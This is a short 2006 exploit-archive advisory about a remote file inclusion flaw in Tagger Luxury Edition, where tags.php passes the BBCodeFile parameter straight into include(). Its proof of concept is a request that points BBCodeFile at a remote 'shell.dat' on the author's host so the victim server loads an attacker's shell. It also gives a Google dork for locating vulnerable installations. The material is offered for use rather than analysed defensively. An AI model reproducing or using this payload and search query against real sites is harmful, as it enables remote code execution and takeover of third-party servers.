[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Tagger Luxury Edition (BBCodeFile) Remote File Include Vulnerability
# Published : 2006-08-09
# Author : Morgan
# Previous Title : See-Commerce <= 1.0.625 (owimg.php3) Remote Include Vulnerability
# Next Title : TinyWebGallery <= 1.5 (image) Remote Include Vulnerabilities
Tagger v3 <= BBCodeFile Remote file inclusion
Discovered by : Morgan
Error in : tags.php
include($BBCodeFile);
Vendor Website: http://www.venturenine.com
PoC:
http://victim-site.com/tags.php?BBCodeFile=http://ehmorgan.net/shell.dat?
Google dork:
intitle:"Tagger LE" inurl:tags.php
Visit us :
www.ehmorgan.net
irc.gigachat.net
#Morgan
# www.Syue.com [2006-08-09]